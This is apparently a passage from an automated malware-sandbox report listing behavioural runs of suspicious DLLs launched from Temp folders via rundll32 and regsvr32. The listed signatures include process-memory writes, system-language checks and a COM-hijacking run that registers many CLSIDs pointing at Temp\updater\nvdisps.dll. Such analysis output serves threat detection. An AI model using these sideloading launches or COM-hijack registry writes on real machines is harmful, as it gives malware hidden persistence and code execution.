| PID 2224 wrote to memory of 2380 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libd3d11va_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libd3d11va_plugin.dll,#1
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
145s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 100 wrote to memory of 464 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 100 wrote to memory of 464 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 100 wrote to memory of 464 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\contactsUX.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\contactsUX.dll
Network
| Country | Destination | Domain | Proto |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20240903-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\msidcrl40.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\msidcrl40.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 268
Network
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20240903-en
Max time kernel
122s
Max time network
127s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2956 wrote to memory of 2256 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2956 wrote to memory of 2256 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2956 wrote to memory of 2256 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2956 wrote to memory of 2256 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2956 wrote to memory of 2256 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2956 wrote to memory of 2256 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2956 wrote to memory of 2256 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\msvcr80.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\msvcr80.dll,#1
Network
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
145s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3416 wrote to memory of 4176 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3416 wrote to memory of 4176 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3416 wrote to memory of 4176 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libimem_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libimem_plugin.dll,#1
Network
| Country | Destination | Domain | Proto |
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20241010-en
Max time kernel
121s
Max time network
130s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2280 wrote to memory of 1116 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2280 wrote to memory of 1116 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2280 wrote to memory of 1116 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2280 wrote to memory of 1116 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2280 wrote to memory of 1116 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2280 wrote to memory of 1116 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2280 wrote to memory of 1116 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdrawable_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdrawable_plugin.dll,#1
Network
Files
Analysis: behavioral28
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
151s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2716 wrote to memory of 2372 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2716 wrote to memory of 2372 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2716 wrote to memory of 2372 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdrawable_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdrawable_plugin.dll,#1
Network
| Country | Destination | Domain | Proto |
Files
Analysis: behavioral20
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
154s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4224 wrote to memory of 3988 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4224 wrote to memory of 3988 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4224 wrote to memory of 3988 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libavcodec_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libavcodec_plugin.dll,#1
Network
| Country | Destination | Domain | Proto |
Files
Analysis: behavioral32
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
151s
Command Line
Signatures
Event Triggered Execution: Component Object Model Hijacking
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoHDCPStatus | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ServerMain\CurVer | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{91363F1E-E7CA-4959-85D6-963719EC79FC}\AppID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.NameDisp | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.DualView.1\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ColorSettingsAdv.1 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7945F814-7BFB-4506-A113-2BD66CDC713A}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.TVWizard\CurVer | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AAB8F985-EADA-428B-8636-270F58E1F1EF}\ = "VideoAudioControl Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{73BCA54E-6AEB-4597-8F27-E1284FF12722}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ColorCorrection\CurVer\ = "DisplayServer.ColorCorrection.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{26A37DC6-935D-439B-80DD-C1006AE13D71}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6E4B938E-4BA1-4E8D-BCBA-8C51CE95F94F}\VersionIndependentProgID\ = "DisplayServer.MultiMon" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CC0648AE-7E85-483C-B1DB-9335C9D6F8C7}\AppID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AAB8F985-EADA-428B-8636-270F58E1F1EF}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6017A978-93AD-4F2F-9E2D-07CF8C8DEBC4}\ProgID\ = "DisplayServer.RotateDisplay.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.SetupDigitalAudio.1\ = "SetupDigitalAudio Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.NameDisp.1 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6A22E68F-887C-4221-9DF1-EE0B3AC76497}\AppID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51840041-B26F-4843-B358-22ABB067396C}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AAB8F985-EADA-428B-8636-270F58E1F1EF}\ProgID\ = "DisplayServer.VideoAudioControl.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VariableRefreshRate\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CategoryMultiMon | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.IdentifyDisp.1\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.MultiMon.1\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{894BF76C-115F-44B7-9B32-ABFA7E6A804A}\ProgID\ = "DisplayServer.MultiView.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7945F814-7BFB-4506-A113-2BD66CDC713A}\VersionIndependentProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{80BA3813-908F-4D4C-A5FF-263640AD5B7A}\TypeLib\ = "{25EBA1D0-EB51-4CBE-8515-23E81DF77F97}" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.AdjustDesktopSizePos.1\CLSID\ = "{074BFFFD-4E50-42c1-A7EB-40D9D70F2471}" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.AdjustSizePosExt\CLSID\ = "{6539579C-2657-45E5-985F-835E197959C2}" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CustomRez\ = "CustomRez Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6E4B938E-4BA1-4E8D-BCBA-8C51CE95F94F}\ = "MultiMon Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AAB8F985-EADA-428B-8636-270F58E1F1EF} | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEF5290C-7F3D-4640-93F2-F189DC616510}\VersionIndependentProgID\ = "DisplayServer.VideoHDCPStatus" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{26A37DC6-935D-439B-80DD-C1006AE13D71}\VersionIndependentProgID\ = "DisplayServer.Config" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6017A978-93AD-4F2F-9E2D-07CF8C8DEBC4}\ = "RotateDisplay Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CategoryAppearance.1\CLSID\ = "{01367108-5EE2-4E1C-A8DE-24438065ABC9}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{88FC94D1-2ABB-42CF-8A07-4BC54F66EDDF} | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0FB41BD0-3107-40A5-8D49-456E585947B2} | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0FB41BD0-3107-40A5-8D49-456E585947B2}\ProgID\ = "DisplayServer.IdentifyDisp.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6A22E68F-887C-4221-9DF1-EE0B3AC76497}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoHDCPStatus.1\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CategoryAppearance.1\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CustomRez\CurVer\ = "DisplayServer.CustomRez.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{49F585C0-CE12-4306-9100-B6A28857B10B}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51840041-B26F-4843-B358-22ABB067396C}\VersionIndependentProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{25EBA1D0-EB51-4CBE-8515-23E81DF77F97}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoAudioControl\CurVer\ = "DisplayServer.VideoAudioControl.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEF5290C-7F3D-4640-93F2-F189DC616510}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1BC39379-8D90-4F18-8817-795C57163770}\AppID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoHDCPStatus.1 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51840041-B26F-4843-B358-22ABB067396C}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6539579C-2657-45E5-985F-835E197959C2}\VersionIndependentProgID\ = "DisplayServer.AdjustSizePosExt" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{88FC94D1-2ABB-42CF-8A07-4BC54F66EDDF}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{63005CD0-8541-439c-A66A-617F4B1F2BCB}\ = "TVWizard Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A3B877C7-83CA-4c9b-87FB-BE0D518C2441}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VariableRefreshRate\CLSID\ = "{80BA3813-908F-4D4C-A5FF-263640AD5B7A}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CategoryMultiMon.1\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.DualView\CurVer\ = "DisplayServer.DualView.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoHDCPStatus.1\CLSID\ = "{EEF5290C-7F3D-4640-93F2-F189DC616510}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{80BA3813-908F-4D4C-A5FF-263640AD5B7A}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6539579C-2657-45E5-985F-835E197959C2}\ProgID\ = "DisplayServer.AdjustSizePosExt.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.MultiView.1\CLSID\ = "{894BF76C-115F-44B7-9B32-ABFA7E6A804A}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.DualView\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\updater\nvdisps.dll
Network
| Country | Destination | Domain | Proto |
Files
Analysis: behavioral17
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20240903-en
Max time kernel
120s
Max time network
123s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2316 wrote to memory of 2736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2316 wrote to memory of 2736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2316 wrote to memory of 2736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2316 wrote to memory of 2736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2316 wrote to memory of 2736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2316 wrote to memory of 2736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2316 wrote to memory of 2736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libwasapi_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libwasapi_plugin.dll,#1